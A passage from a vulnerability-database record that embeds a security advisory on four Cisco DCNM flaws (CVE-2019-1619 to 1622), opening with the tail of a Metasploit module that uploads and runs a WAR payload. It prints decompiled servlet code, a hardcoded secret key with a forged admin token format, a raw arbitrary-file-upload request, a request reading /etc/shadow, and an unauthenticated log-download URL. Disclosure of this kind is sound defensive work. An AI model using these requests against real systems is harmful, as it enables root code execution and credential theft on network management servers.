post_data.to_s\n\n    print_status(\"#{peer} - Uploading payload...\")\n    res = send_request_cgi(\n      \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm\u0027, \u0027fileUpload\u0027),\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027data\u0027   =\u003e data,\n      \u0027cookie\u0027 =\u003e jsession,\n      \u0027ctype\u0027  =\u003e \"multipart/form-data; boundary=#{post_data.bound}\"\n    )\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body[/#{fname}/]\n      print_good(\"#{peer} - WAR uploaded, waiting a few seconds for deployment...\")\n\n      sleep 10\n\n      print_status(\"#{peer} - Executing payload...\")\n      send_request_cgi(\n        \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, app_base),\n        \u0027method\u0027 =\u003e \u0027GET\u0027\n      )\n    else\n      fail_with(Failure::Unknown, \"#{peer} - Failed to upload WAR file\")\n    end\n  end\nend\n. \nDCNM is widely deloyed in data centres worldwide to manage Cisco devices on a global scale. \n\nDCNM 11.1(1) and below is affected by four vulnerabilities: authentication bypass, arbitrary file upload (leading to remote code execution), arbitrary file download and information disclosure via log download. \n\nThe table below lists the affected versions for each vulnerability:\n\nVulnerability                                           Vulnerable?                              CVE\n                            \u003c= 10.4(2)          11.0(1)         11.1(1)       \u003e= 11.2(1) \nAuthentication bypass           Yes               No              No              No           2019-1619\nFile upload                 Yes, auth          Yes, auth      Yes, unauth         No           2019-1620\nFile download               Yes, auth          Yes, auth      Yes, unauth         No           2019-1621\nInfo disclosure             Yes, unauth        Yes, unauth    Yes, unauth         ?            2019-1622\n\nThe authentication bypass affects versions 10.4(2), allowing an attacker to exploit the file upload for remote code execution. \nIn version 11.0(1), authentication was introduced, and a valid unprivileged account is necessary to exploit all vulnerabilities except information discloure. \nAmazingly, in version 11.1(1) Cisco removed the authentication for the file upload and file download servlets, allowing an attacker exploit the vulnerabilities without any authentication!\nAll vulnerabilities were fixed in 11.2(1), except the information disclosure, for which the status is unknown. \n\nTo achieve remote code execution with arbitrary file upload vulnerability, an attacker can write a WAR file in the Tomcat webapps folder. The Apache Tomcat server is running as root, meaning that the Java shell will run as root. \n\nAgile Information Security would like to thank the iDefense Vulnerability Contributor Program for handling the disclosure process with Cisco [1]. DCNM 11 provides management, control, automation, monitoring, visualization, and troubleshooting across Cisco Nexus\u00ae and Cisco Multilayer Distributed Switching (MDS) solutions. \nDCNM 11 supports multitenant, multifabric infrastructure management for Cisco Nexus Switches. DCNM also supports storage management with the Cisco MDS 9000 family and Cisco Nexus switch storage functions. By abusing this servlet, an unauthenticated attacker can obtain a valid administrative session on the web interface [3]. \n\nThe snippet of code below shows what the servlet does:\ncom.cisco.dcbu.web.client.performance.ReportServlet\n\n\tpublic void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\t\tCredentials cred = (Credentials)request.getSession().getAttribute(\"credentials\");\n\t\tif((cred == null || !cred.isAuthenticated()) \u0026\u0026 !\"fetch\".equals(request.getParameter(\"command\")) \u0026\u0026 !this.verifyToken(request)) {\n\t\t\trequest.setAttribute(\"popUpSessionTO\", \"true\");\n\t\t}\n\n\t\tthis.doInteractiveChart(request, response);\n\t}\n  \nThe request is passed on to the verifyToken function, listed below:\n  private boolean verifyToken(HttpServletRequest httpServletRequest) {\n\t\tString token = httpServletRequest.getParameter(\"token\");\n\t\tif(token == null) {\n\t\t\treturn false;\n\t\t} else {\n\t\t\ttry {\n\t\t\t\tFMServerRif serverRif = SQLLoader.getServerManager();\n\t\t\t\tIscRif isc = serverRif.getIsc(StringEncrypter.encryptString(\"DESede\", (new Date()).toString()));\n\t\t\t\ttoken = URLDecoder.decode(token, \"UTF-8\");\n\t\t\t\ttoken = token.replace(\u0027 \u0027, \u0027+\u0027);\n\t\t\t\tFMUserBase fmUserBase = isc.verifySSoToken(token);\n\t\t\t\tif(fmUserBase == null) {\n\t\t\t\t\treturn false;\n\t\t\t\t} else {\n\t\t\t\t\tCredentials newCred = new Credentials();\n\t\t\t\t\tint idx = fmUserBase.getUsername().indexOf(64);\n\t\t\t\t\tnewCred.setUserName(idx == -1?fmUserBase.getUsername():fmUserBase.getUsername().substring(0, idx));\n\t\t\t\t\tnewCred.setPassword(StringEncrypter.DESedeDecrypt(fmUserBase.getEncryptedPassword()));\n\t\t\t\t\tnewCred.setRole(fmUserBase.getRole());\n\t\t\t\t\tnewCred.setAuthenticated(true);\n\t\t\t\t\thttpServletRequest.getSession().setAttribute(\"credentials\", newCred);\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t} catch (Exception var8) {\n\t\t\t\tvar8.printStackTrace();\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}\n\t}\n  \nAs it can be seen in the line:\n\t\t\t\tFMUserBase fmUserBase = isc.verifySSoToken(token);\nthe HTTP request parameter \"token\" gets passed to IscRif.verifySsoToken, and if that function returns a valid user, the request is authenticated and credentials are stored in the session. \n\nLet\u0027s dig deeper and find out what happens in IscRif.verifySsoToken. The class implementing is actually com.cisco.dcbu.sm.server.facade.IscImpl:\n\n\tpublic FMUserBase verifySSoToken(String ssoToken) {\n\t\treturn SecurityManager.verifySSoToken(ssoToken);\n\t}\n  \nDigging further into SecurityManager.verifySSoToken:\ncom.cisco.dcbu.sm.server.security.SecurityManager\n\npublic static FMUserBase verifySSoToken(String ssoToken) {\n\t\tString userName = null;\n\t\tFMUserBase fmUserBase = null;\n\t\tFMUser fmUser = null;\n\n\t\ttry {\n\t\t\tuserName = getSSoTokenUserName(ssoToken);\n\t\t\tif(confirmSSOToken(ssoToken)) {\n\t\t\t\tfmUser = UserManager.getInstance().findUser(userName);\n\t\t\t\tif(fmUser != null) {\n\t\t\t\t\tfmUserBase = new FMUserBase(userName, fmUser.getHashedPwd(), fmUser.getRoles());\n\t\t\t\t}\n\n\t\t\t\tif(fmUserBase == null) {\n\t\t\t\t\tfmUserBase = DCNMUserImpl.getFMUserBase(userName);\n\t\t\t\t}\n\n\t\t\t\tif(fmUserBase == null) {\n\t\t\t\t\tfmUserBase = FMSessionManager.getInstance().getFMUser(getSessionIdByToken(ssoToken));\n\t\t\t\t}\n\t\t\t}\n\t\t} catch (Exception var5) {\n\t\t\t_Logger.info(\"verifySSoToken: \", var5);\n\t\t}\n\n\t\treturn fmUserBase;\n\t}\n\nAs it can be seen in the code above, the username is obtained from the token here:\n\t\t\tuserName = getSSoTokenUserName(ssoToken);\n\nDigging yet another layer we find the following:\npublic static String getSSoTokenUserName(String ssoToken) {\n\t\treturn getSSoTokenDetails(ssoToken)[3];\n\t}\n\n\tprivate static String[] getSSoTokenDetails(String ssoToken) {\n\t\tString[] ret = new String[4];\n\t\tString separator = getTokenSeparator();\n\t\tStringTokenizer st = new StringTokenizer(ssoToken, separator);\n\t\tif(st.hasMoreTokens()) {\n\t\t\tret[0] = st.nextToken();\n\t\t\tret[1] = st.nextToken();\n\t\t\tret[2] = st.nextToken();\n\n\t\t\tfor(ret[3] = st.nextToken(); st.hasMoreTokens(); ret[3] = ret[3] + separator + st.nextToken()) {\n\t\t\t\t;\n\t\t\t}\n\t\t}\n\n\t\treturn ret;\n\t}\n  \nSeems like the token is a string which is separated by the \"separator\" with four components, the fourth of which is the username. \n\nNow going back to SecurityManager.verifySSoToken listed above, we see that after the call to getSSoTokenUserName, confirmSSOToken is called:\n        public static FMUserBase verifySSoToken(String ssoToken) {\n                (...)\n\t\t\tuserName = getSSoTokenUserName(ssoToken);\n\t\t\tif(confirmSSOToken(ssoToken)) {\n\t\t\t\tfmUser = UserManager.getInstance().findUser(userName);\n\t\t\t\tif(fmUser != null) {\n\t\t\t\t\tfmUserBase = new FMUserBase(userName, fmUser.getHashedPwd(), fmUser.getRoles());\n\t\t\t\t}\n                (...)\n        }\n                \n\tpublic static boolean confirmSSOToken(String ssoToken) {\n\t\tString userName = null;\n\t\tint sessionId = false;\n\t\tlong sysTime = 0L;\n\t\tString digest = null;\n\t\tint count = false;\n\t\tboolean ret = false;\n\n\t\ttry {\n\t\t\tString[] detail = getSSoTokenDetails(ssoToken);\n\t\t\tuserName = detail[3];\n\t\t\tint sessionId = Integer.parseInt(detail[0]);\n\t\t\tsysTime = (new Long(detail[1])).longValue();\n\t\t\tif(System.currentTimeMillis() - sysTime \u003e 600000L) {\n\t\t\t\treturn ret;\n\t\t\t}\n\n\t\t\tdigest = detail[2];\n\t\t\tif(digest != null \u0026\u0026 digest.equals(getMessageDigest(\"MD5\", userName, sessionId, sysTime))) {\n\t\t\t\tret = true;\n\t\t\t\tuserNameTLC.set(userName);\n\t\t\t}\n\t\t} catch (Exception var9) {\n\t\t\t_Logger.info(\"confirmSSoToken: \", var9);\n\t\t}\n\n\t\treturn ret;\n\t}\n  \nNow we can further understand the token. It seems it is composed of:\nsessionId + separator + sysTime + separator + digest + separator + username\n\t\nAnd what is the digest? Let\u0027s look into the getMessageDigest function:\n  \n\t\n\t\tprivate static String getMessageDigest(String algorithm, String userName, int sessionid, long sysTime) throws Exception {\n\t\t\tString input = userName + sessionid + sysTime + SECRETKEY;\n\t\t\tMessageDigest md = MessageDigest.getInstance(algorithm);\n\t\t\tmd.update(input.getBytes());\n\t\t\treturn new String(Base64.encodeBase64((byte[])md.digest()));\n\t\t}\n    \nIt is nothing more than the MD5 of:\nuserName + sessionid + sysTime + SECRETKEY\n\n... and SECRETKEY is a fixed key in the code:\n\tprivate static final String SECRETKEY = \"POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\";\n  \n... while the separator is a \".\":\n\t  private static String getTokenSeparator()\n\t  {\n      return System.getProperty(\"security.tokenSeparator\", \".\");\n\t  }\n    \nIn summary, this is what happens:\nThe ReportServlet will happily authenticate any request, as long as it receives a token in the following format:\nsessionId.sysTime.MD5(userName + sessionid + sysTime + SECRETKEY).username\n\nThe sessionId can be made up by the user, sysTime can be obtained by getting the server Date HTTP header and then converting to milliseconds, and we know the SECRETKEY and the username, so now we can authenticate as any user. Here\u0027s an example token:\nGET /fm/pmreport?token=1337.1535935659000.upjVgZQmxNNgaXo5Ga6jvQ==.admin\n\nThis request will return a 500 error due to the lack of some parameters necessary for the servlet to execute correctly, however it will also successfully authenticate us to the server, which will cause it to return a JSESSIONID cookie with valid authenticated session for the admin user. \nNote that the user has to be valid. The \"admin\" user is a safe bet as it is present by default in all systems, and it is also the most privileged user in the system. \n\nUnfortunately, this technique does not work for 11.0(1). I believe this is not because the vulnerability was fixed, as the exact same code is present in the newer version. \nIn 11.0(1), the ReportServlet.verifyToken function crashes with an exception in the line noted below:\n\n  private boolean verifyToken(HttpServletRequest httpServletRequest) {\n        (...)\n\t\t\t\t\tCredentials newCred = new Credentials();\n\t\t\t\t\tint idx = fmUserBase.getUsername().indexOf(64);\n\t\t\t\t\tnewCred.setUserName(idx == -1?fmUserBase.getUsername():fmUserBase.getUsername().substring(0, idx));\n\t\t\t\t\tnewCred.setPassword(StringEncrypter.DESedeDecrypt(fmUserBase.getEncryptedPassword()));                    \u003c--- exception occurs here\n\t\t\t\t\tnewCred.setRole(fmUserBase.getRole());\n\t\t\t\t\tnewCred.setAuthenticated(true);\n\t\t\t\t\thttpServletRequest.getSession().setAttribute(\"credentials\", newCred);\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t} catch (Exception var8) {\n\t\t\t\tvar8.printStackTrace();\n\t\t\t\treturn false;\n\t\t\t}\n        (...)\n  }\n      \nThe exception returned is a \"com.cisco.dcbu.lib.util.StringEncrypter$EncryptionException: javax.crypto.BadPaddingException: Given final block not properly padded\". \nThis will cause execution to go into the catch block shown above, and the function will return false, so the JSESSIONID cookie returned by the server will not have the credentials stored in it. \n\nI believe this is purely a coding mistake - Cisco updated their password encryption method, but failed to update their own code. Unless this ReportServlet code is deprecated, this is a real bug that happens to fix a security vulnerability by accident. \n\nOn version 11.0(1), it seems that the ReportServlet has been removed from the corresponding WAR xml mapping file, so requesting that URL now returns an HTTP 404 error. An authenticated user can abuse this servlet to upload files to an arbitrary directory and ultimately achieve remote code execution [4]. \n\nThe code for this servlet is listed below:\ncom.cisco.dcbu.web.client.reports.FileUploadServlet\n\n\tpublic void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\t\tthis.doGet(request, response);\n\t}\n\n\tpublic void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\t\tCredentials cred = (Credentials)((Object)request.getSession().getAttribute(\"credentials\"));\n\t\tif (cred == null || !cred.isAuthenticated()) {\n\t\t\tthrow new ServletException(\"User not logged in or Session timed out.\");\n\t\t}\n\t\tthis.handleUpload(request, response);\n\t}\n  \nThe code shown above is simple, and the request is passed onto handleUpload:\n\n\tprivate void handleUpload(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\t\tresponse.setContentType(CONTENT_TYPE);\n\t\tPrintWriter out = null;\n\t\tArrayList\u003cString\u003e allowedFormats = new ArrayList\u003cString\u003e();\n\t\tallowedFormats.add(\"jpeg\");\n\t\tallowedFormats.add(\"png\");\n\t\tallowedFormats.add(\"gif\");\n\t\tallowedFormats.add(\"jpg\");\n\t\tallowedFormats.add(\"cert\");\n\t\tFile disk = null;\n\t\tFileItem item = null;\n\t\tDiskFileItemFactory factory = new DiskFileItemFactory();\n\t\tString statusMessage = \"\";\n\t\tString fname = \"\";\n\t\tString uploadDir = \"\";\n\t\tListIterator iterator = null;\n\t\tList items = null;\n\t\tServletFileUpload upload = new ServletFileUpload((FileItemFactory)factory);\n\t\tTransformerHandler hd = null;\n\t\ttry {\n\t\t\tout = response.getWriter();\n\t\t\tStreamResult streamResult = new StreamResult(out);\n\t\t\tSAXTransformerFactory tf = (SAXTransformerFactory)SAXTransformerFactory.newInstance();\n\t\t\titems = upload.parseRequest(request);\n\t\t\titerator = items.listIterator();\n\t\t\thd = tf.newTransformerHandler();\n\t\t\tTransformer serializer = hd.getTransformer();\n\t\t\tserializer.setOutputProperty(\"encoding\", \"UTF-8\");\n\t\t\tserializer.setOutputProperty(\"doctype-system\", \"response.dtd\");\n\t\t\tserializer.setOutputProperty(\"indent\", \"yes\");\n\t\t\tserializer.setOutputProperty(\"method\", \"xml\");\n\t\t\thd.setResult(streamResult);\n\t\t\thd.startDocument();\n\t\t\tAttributesImpl atts = new AttributesImpl();\n\t\t\thd.startElement(\"\", \"\", \"response\", atts);\n\t\t\twhile (iterator.hasNext()) {\n\t\t\t\tatts.clear();\n\t\t\t\titem = (FileItem)iterator.next();\n\t\t\t\tif (item.isFormField()) {\n\t\t\t\t\tif (item.getFieldName().equalsIgnoreCase(\"fname\")) {\n\t\t\t\t\t\tfname = item.getString();\n\t\t\t\t\t}\n\t\t\t\t\tif (item.getFieldName().equalsIgnoreCase(\"uploadDir\") \u0026\u0026 (uploadDir = item.getString()).equals(DEFAULT_TRUST_STORE_UPLOADDIR)) {\n\t\t\t\t\t\tuploadDir = ClientCache.getJBossHome() + File.separator + \"server\" + File.separator + \"fm\" + File.separator + \"conf\";\n\t\t\t\t\t}\n\t\t\t\t\tatts.addAttribute(\"\", \"\", \"id\", \"CDATA\", item.getFieldName());\n\t\t\t\t\thd.startElement(\"\", \"\", \"field\", atts);\n\t\t\t\t\thd.characters(item.getString().toCharArray(), 0, item.getString().length());\n\t\t\t\t\thd.endElement(\"\", \"\", \"field\");\n\t\t\t\t\tatts.clear();\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\tImageInputStream imageInputStream = ImageIO.createImageInputStream(item.getInputStream());\n\t\t\t\tIterator\u003cImageReader\u003e imageReaders = ImageIO.getImageReaders(imageInputStream);\n\t\t\t\tImageReader imageReader = null;\n\t\t\t\tif (imageReaders.hasNext()) {\n\t\t\t\t\timageReader = imageReaders.next();\n\t\t\t\t}\n\t\t\t\ttry {\n\t\t\t\t\tString imageFormat = imageReader.getFormatName();\n\t\t\t\t\tString newFileName = fname + \".\" + imageFormat;\n\t\t\t\t\tif (allowedFormats.contains(imageFormat.toLowerCase())) {\n\t\t\t\t\t\tFileFilter fileFilter = new FileFilter();\n\t\t\t\t\t\tfileFilter.setImageTypes(allowedFormats);\n\t\t\t\t\t\tFile[] fileList = new File(uploadDir).listFiles(fileFilter);\n\t\t\t\t\t\tfor (int i = 0; i \u003c fileList.length; ++i) {\n\t\t\t\t\t\t\tnew File(fileList[i].getAbsolutePath()).delete();\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdisk = new File(uploadDir + File.separator + fname);\n\t\t\t\t\t\titem.write(disk);\n\t\t\t\t\t\tCalendar calendar = Calendar.getInstance();\n\t\t\t\t\t\tSimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"MM.dd.yy hh:mm:ss aaa\");\n\t\t\t\t\t\tstatusMessage = \"File successfully written to server at \" + simpleDateFormat.format(calendar.getTime());\n\t\t\t\t\t}\n\t\t\t\t\timageReader.dispose();\n\t\t\t\t\timageInputStream.close();\n\t\t\t\t\tatts.addAttribute(\"\", \"\", \"id\", \"CDATA\", newFileName);\n\t\t\t\t}\n\t\t\t\tcatch (Exception ex) {\n\t\t\t\t\tthis.processUploadedFile(item, uploadDir, fname);\n\t\t\t\t\tCalendar calendar = Calendar.getInstance();\n\t\t\t\t\tSimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"MM.dd.yy hh:mm:ss aaa\");\n\t\t\t\t\tstatusMessage = \"File successfully written to server at \" + simpleDateFormat.format(calendar.getTime());\n\t\t\t\t\tatts.addAttribute(\"\", \"\", \"id\", \"CDATA\", fname);\n\t\t\t\t}\n\t\t\t\thd.startElement(\"\", \"\", \"file\", atts);\n\t\t\t\thd.characters(statusMessage.toCharArray(), 0, statusMessage.length());\n\t\t\t\thd.endElement(\"\", \"\", \"file\");\n\t\t\t}\n\t\t\thd.endElement(\"\", \"\", \"response\");\n\t\t\thd.endDocument();\n\t\t\tout.close();\n\t\t}\n\t\tcatch (Exception e) {\n\t\t\tout.println(e.getMessage());\n\t\t}\n\t}\n  \nhandleUpload is more complex, but here\u0027s a summary; the function takes an HTTP form with a parameter \"uploadDir\", a parameter \"fname\" and then takes the last form object and writes it into \"uploadDir/fname\". \nHowever, there is a catch... the file has to be a valid image with one of the extensions listed here:\n\t\tallowedFormats.add(\"jpeg\");\n\t\tallowedFormats.add(\"png\");\n\t\tallowedFormats.add(\"gif\");\n\t\tallowedFormats.add(\"jpg\");\n\t\tallowedFormats.add(\"cert\");\n    \nHowever, if you look closely, it is possible to upload any arbitrary content. This is because nothing bad happens until we reach the second (inner) try-catch block. Once inside, the first thing that happens is this:\n\t\t\t\ttry {\n\t\t\t\t\tString imageFormat = imageReader.getFormatName();\n\n... which will cause imageReader to throw and exception if the binary content we sent is not a file, sending us into the catch block:\n\t\t\t\tcatch (Exception ex) {\n\t\t\t\t\tthis.processUploadedFile(item, uploadDir, fname);\n\t\t\t\t\tCalendar calendar = Calendar.getInstance();\n\t\t\t\t\tSimpleDateFormat simpleDateFormat = new SimpleDateFormat(\"MM.dd.yy hh:mm:ss aaa\");\n\t\t\t\t\tstatusMessage = \"File successfully written to server at \" + simpleDateFormat.format(calendar.getTime());\n\t\t\t\t\tatts.addAttribute(\"\", \"\", \"id\", \"CDATA\", fname);\n          \n... meaning that the file contents, upload dir and its name are sent into processUploadedFile. \n\nLet\u0027s look into that now:\n\tprivate void processUploadedFile(FileItem item, String uploadDir, String fname) throws Exception {\n\t\ttry {\n\t\t\tint offset;\n\t\t\tint contentLength = (int)item.getSize();\n\t\t\tInputStream raw = item.getInputStream();\n\t\t\tBufferedInputStream in = new BufferedInputStream(raw);\n\t\t\tbyte[] data = new byte[contentLength];\n\t\t\tint bytesRead = 0;\n\t\t\tfor (offset = 0; offset \u003c contentLength \u0026\u0026 (bytesRead = in.read(data, offset, data.length - offset)) != -1; offset += bytesRead) {\n\t\t\t}\n\t\t\tin.close();\n\t\t\tif (offset != contentLength) {\n\t\t\t\tthrow new IOException(\"Only read \" + offset + \" bytes; Expected \" + contentLength + \" bytes\");\n\t\t\t}\n\t\t\tFileOutputStream out = new FileOutputStream(uploadDir + File.separator + fname);\n\t\t\tout.write(data);\n\t\t\tout.flush();\n\t\t\tout.close();\n\t\t}\n\t\tcatch (Exception ex) {\n\t\t\tthrow new Exception(\"FileUploadSevlet processUploadFile failed: \" + ex.getMessage());\n\t\t}\n\t}\n  \nAmazingly, this function totally ignores the content, and simple writes the file contents to the filename and folder we have indicated. \nIn summary, if we send any binary content that is not a file, we can write it to any new file in any directory as root. \n  \nIf we send the following request:\nPOST /fm/fileUpload HTTP/1.1\nHost: 10.75.1.40\nCookie: JSESSIONID=PcW4XFtcG6fkMUg7FpkZYJ5C;\nContent-Length: 429\nContent-Type: multipart/form-data; boundary=---------------------------9313517619947\n\n-----------------------------9313517619947\nContent-Disposition: form-data; name=\"fname\"\n\nowned\n-----------------------------9313517619947\nContent-Disposition: form-data; name=\"uploadDir\"\n\n/tmp/\n-----------------------------9313517619947\nContent-Disposition: form-data; name=\"filePath\"; filename=\"whatever\"\nContent-Type: application/octet-stream\n\n\u003cany text or binary content here\u003e\n\n-----------------------------9313517619947--\n\nThe server will respond with:\nHTTP/1.1 200 OK\nX-FRAME-OPTIONS: SAMEORIGIN\nContent-Type: text/xml;charset=utf-8\nDate: Mon, 03 Sep 2018 00:57:11 GMT\nConnection: close\nServer: server\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003c!DOCTYPE response SYSTEM \"response.dtd\"\u003e\n\u003cresponse\u003e\n\u003cfield id=\"fname\"\u003eowned\u003c/field\u003e\n\u003cfield id=\"uploadDir\"\u003e/tmp/\u003c/field\u003e\n\u003cfile id=\"whatever\"\u003eFile successfully written to server at 09.02.18 05:57:11 PM\u003c/file\u003e\n\u003c/response\u003e\n\nAnd our file has been written as root on the server:\n[root@dcnm_vm ~]# ls -l /tmp/\n(...)\n-rw-r--r--  1 root          root               16 Sep  2 17:57 owned\n(...)\n\nFinally if we write a WAR file to the JBoss deployment directory, and the server will deploy the WAR file as root, allowing the attacker to achieve remote code execution. \n\nA Metasploit module that exploits this vulnerability has been released with this advisory. An authenticated user can abuse this servlet to download arbitrary files as root [5]. \n\nThe code below shows the servlet request processing code:\ncom.cisco.dcbu.web.client.util.DownloadServlet \n\n\tpublic void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n\t\tCredentials cred = (Credentials)((Object)request.getSession().getAttribute(\"credentials\"));\n\t\tif (cred == null || !cred.isAuthenticated()) {\n\t\t\tthrow new ServletException(\"User not logged in or Session timed out.\");\n\t\t}\n\t\tString showFile = (String)request.getAttribute(\"showFile\");\n\t\tif (showFile == null) {\n\t\t\tshowFile = request.getParameter(\"showFile\");\n\t\t}\n\t\tFile f = new File(showFile);\n\t\tif (showFile.endsWith(\".cert\")) {\n\t\t\tresponse.setContentType(\"application/octet-stream\");\n\t\t\tresponse.setHeader(\"Pragma\", \"cache\");\n\t\t\tresponse.setHeader(\"Cache-Control\", \"cache\");\n\t\t\tresponse.setHeader(\"Content-Disposition\", \"attachment; filename=fmserver.cert;\");\n\t\t} else if (showFile.endsWith(\".msi\")) {\n\t\t\tresponse.setContentType(\"application/x-msi\");\n\t\t\tresponse.setHeader(\"Pragma\", \"cache\");\n\t\t\tresponse.setHeader(\"Cache-Control\", \"cache\");\n\t\t\tresponse.setHeader(\"Content-Disposition\", \"attachment; filename=\" + f.getName() + \";\");\n\t\t} else if (showFile.endsWith(\".xls\")) {\n\t\t\tresponse.setContentType(\"application/vnd.ms-excel\");\n\t\t\tresponse.setHeader(\"Pragma\", \"cache\");\n\t\t\tresponse.setHeader(\"Cache-Control\", \"cache\");\n\t\t\tresponse.setHeader(\"Content-Disposition\", \"attachment; filename=\" + f.getName() + \";\");\n\t\t}\n\t\tServletOutputStream os = response.getOutputStream();\n\t\tFileInputStream is = new FileInputStream(f);\n\t\tbyte[] buffer = new byte[4096];\n\t\tint read = 0;\n\t\ttry {\n\t\t\twhile ((read = is.read(buffer)) \u003e 0) {\n\t\t\t\tos.write(buffer, 0, read);\n\t\t\t}\n\t\t\tos.flush();\n\t\t}\n\t\tcatch (Exception e) {\n\t\t\tLogService.log(LogService._WARNING, e.getMessage());\n\t\t}\n\t\tfinally {\n\t\t\tis.close();\n\t\t}\n\t}\n}\n\nAs you can see, it\u0027s quite simple. It takes a \"showFile\" request parameter, reads that file and returns to the user. Here\u0027s an example of the servlet in action:\n\nRequest:\nGET /fm/downloadServlet?showFile=/etc/shadow HTTP/1.1\nHost: 10.75.1.40\nCookie: JSESSIONID=PcW4XFtcG6fkMUg7FpkZYJ5C;\n\nResponse:\nHTTP/1.1 200 OK\n\nroot:$1$(REDACTED).:17763:0:99999:7:::\nbin:*:15980:0:99999:7:::\ndaemon:*:15980:0:99999:7:::\nadm:*:15980:0:99999:7:::\nlp:*:15980:0:99999:7:::\n(...)\n\nAn interesting file to download is /usr/local/cisco/dcm/fm/conf/server.properties, which contains the database credentials as well as the sftp root password, both encrypted with a key that is hardcoded in the source code. \n\nA Metasploit module that exploits this vulnerability has been released with this advisory. This servlet can be accessed by an unauthenticated attacker, and it will return all the log files in /usr/local/cisco/dcm/fm/logs/* in ZIP format, which provide information about local directories, software versions, authentication errors, detailed stack traces, etc [6]. \n\nTo access it, simply request:\nGET /fm/log/fmlogs.zip\n\nCode is not shown here for brevity, but the implementation class is com.cisco.dcbu.web.client.admin.LogZipperServlet. \n\n\n\u003e\u003e Fix: \nFor #1, upgrade to DCNM 11.0(1) and above [3]. \nFor #2 and #3, upgrade to DCNM 11.2(1) and above [4] [5]. \nFor #4, it is not clear from Cisco\u0027s advisory on which version it was fixed [6]. \n\n\n\u003e\u003e References:\n[1] https://www.accenture.com/us-en/service-idefense-security-intelligence\n[2] https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/prime-data-center-network-manager/datasheet-c78-740978.html\n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\n[4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex\n[5] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld\n[6] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-infodiscl\n\n\n\u003e\u003e Disclaimer:\nPlease note that Agile Information Security relies on the information provided by the vendor when listing fixed versions or products. Agile Information Security does not verify this information, except when specifically mentioned in this advisory or when requested or contracted by the vendor to do so. \nUnconfirmed vendor fixes might be ineffective or incomplete, and it is the vendor\u0027s responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. \nAgile Information Security Limited does not accept any responsiblity, financial or otherwise, from any material losses, loss of life or reputational loss as a result of misuse of the information or code contained or mentioned in this advisory. \nIt is the vendor\u0027s responsibility to ensure their products\u0027 security before, during and after release to market. \n\nAll information, code and binary data in this advisory is released to the public under the GNU General Public License, version 3 (GPLv3). \nFor information, code or binary data obtained from other sources that has a license which is incompatible with GPLv3, the original license prevails. \nFor more information check https://www.gnu.org/licenses/gpl-3.0.en.html\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "BID",
        "id": "108902"
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "db": "PACKETSTORM",
        "id": "154304"
      },
      {
        "db": "PACKETSTORM",
        "id": "153546"
      }
    ],
    "trust": 2.79
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-148311",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47347",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-1619",
        "trust": 3.7
      },
      {
        "db": "BID",
        "id": "108902",
        "trust": 2.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154304",
        "trust": 1.9
      },
      {
        "db": "PACKETSTORM",
        "id": "153546",
        "trust": 1.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044",
        "trust": 0.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "47347",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2315",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619",
        "trust": 0.1
      }
    ],
    "sources": [
      {
